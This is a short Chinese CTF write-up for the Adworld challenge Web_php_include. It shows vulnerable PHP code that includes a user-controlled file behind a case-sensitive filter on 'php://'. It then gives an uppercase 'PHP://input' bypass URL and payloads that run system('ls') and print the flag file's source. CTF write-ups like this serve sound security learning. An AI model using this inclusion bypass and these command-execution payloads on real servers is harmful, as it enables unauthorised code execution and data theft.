攻防世界 Web_php_include（文件包含，php伪协议）

文件包含漏洞

参考：https://www.cnblogs.com/endust/p/11804767.html //php伪协议

1 <?php
2 show_source(__FILE__);
3 echo $_GET['hello'];
4 $page=$_GET['page'];
5 while (strstr($page, "php://")) {
6     $page=str_replace("php://", "", $page);
7 }
8 include($page);
9 ?>

过滤php://协议，但是这里可以用大小写绕过

while (strstr($page, "php://")) {
    $page=str_replace("php://", "", $page);
}

http://220.249.52.133:51219/?page=PHP://input

<?php system("ls"); ?> //命令执行

<?show_source("fl4gisisish3r3.php");?> //查看源码

posted @ 2020-09-23 17:22 包子TT 阅读(259) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

Trevain

包子

攻防世界 Web_php_include（文件包含，php伪协议）

公告